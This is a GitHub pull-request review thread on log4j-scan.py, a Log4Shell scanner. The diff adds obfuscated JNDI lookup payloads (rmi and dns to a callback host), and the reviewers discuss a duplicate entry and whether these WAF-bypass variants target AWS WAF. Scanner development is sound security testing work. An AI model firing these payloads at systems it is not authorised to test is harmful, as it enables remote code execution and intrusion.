log4j-scan.py

```diff
@@ -57,7 +57,16 @@
                        "${${lower:${lower:jndi}}:${lower:rmi}://{{callback_host}}/{{random}}}",
                        "${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://{{callback_host}}/{{random}}}",
                        "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://{{callback_host}}/{{random}}}",
-                       "${jndi:dns://{{callback_host}}}"]
+                       "${jndi:dns://{{callback_host}}}",
```

Comment:
@1uffyD9, you have added the same bypass twice here ("${jndi:dns://{{callback_host}}}") and also you have not closed the list in a proper way.

Reply:
Please check the comment I added at 69th line.

Reply:
Ohh yeah shi*, my bad. I forgot github shows the original line as well in the PRs. Okay cool cool. Btw these waf bypasses, they are mostly for AWS waf right? For kubernetes clusters? I saw it in thw waf-bypass.com site.

Reply:
Actually I saw the initial payload on twitter, yes, it said it's a AWS WAF bypassing method. Then I tried it on local deployment and it worked. Then I mixed up the things. 😄